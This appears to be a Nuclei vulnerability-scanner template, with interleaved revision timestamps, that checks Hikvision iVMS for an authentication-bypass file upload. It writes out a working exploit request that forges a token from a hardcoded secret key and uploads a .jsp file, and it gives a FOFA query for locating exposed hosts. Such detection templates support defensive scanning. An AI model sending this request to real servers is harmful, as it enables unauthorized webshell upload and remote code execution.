2023-08-24 10:44:56 +00:00
id : hikvision-ivms-file-upload-bypass
info :
2023-08-24 11:44:56 +00:00
name : Hikvison iVMS - File Upload Bypass
2023-08-24 10:44:56 +00:00
author : SleepingBag945
2023-08-24 12:38:26 +00:00
severity : critical
description : Hikvision iVMS integrated security system has a vulnerability that allows arbitrary file uploads. Attackers can exploit this vulnerability by obtaining the encryption key to create a forged token. By using the forged token, they can make requests to the "/resourceOperations/upload" interface to upload files of their choice. This can lead to gaining unauthorized webshell access on the server, enabling remote execution of malicious code.
2023-08-24 10:44:56 +00:00
reference :
- https://blog.csdn.net/qq_41904294/article/details/130807691
metadata :
2023-08-25 03:57:19 +00:00
verified : true
2023-10-14 11:27:55 +00:00
max-request : 1
fofa-query : icon_hash="-911494769"
2023-08-24 10:44:56 +00:00
tags : hikvision,ivms,intrusive,fileupload,auth-bypass
http :
- raw :
- |
POST /eps/api/resourceOperations/upload?token={{to_upper(md5(concat("{{RootURL}}","/eps/api/resourceOperations/uploadsecretKeyIbuilding")))}} HTTP/1.1
Host : {{Hostname}}
2023-08-24 12:38:26 +00:00
Content-Type : multipart/form-data;boundary=----WebKitFormBoundaryGEJwiloiPo
2023-08-24 10:49:35 +00:00
2023-08-24 12:38:26 +00:00
------WebKitFormBoundaryGEJwiloiPo
Content-Disposition : form-data; name="fileUploader";filename="{{randstr}}.jsp"
Content-Type : image/jpeg
{{randstr}}
2023-08-24 12:55:47 +00:00
------WebKitFormBoundaryGEJwiloiPo%20
2023-08-24 10:49:35 +00:00
2023-08-24 10:44:56 +00:00
matchers :
2023-08-24 12:38:26 +00:00
- type : word
part : body
words :
- '"success":true'
- '"resourceName":'
2023-08-24 10:44:56 +00:00
condition : and
2023-10-20 11:41:13 +00:00
# digest: 490a00463044022063f41bfa89c634aa9271cd12a8e97f526188d4fcb0102d9ce91c630d0d32e7fc02201cd682c8e83522c4064155836911e725b3537cabf728f97d8899d92b72e404e9:922c64590222798bb761d5b6d8e72950
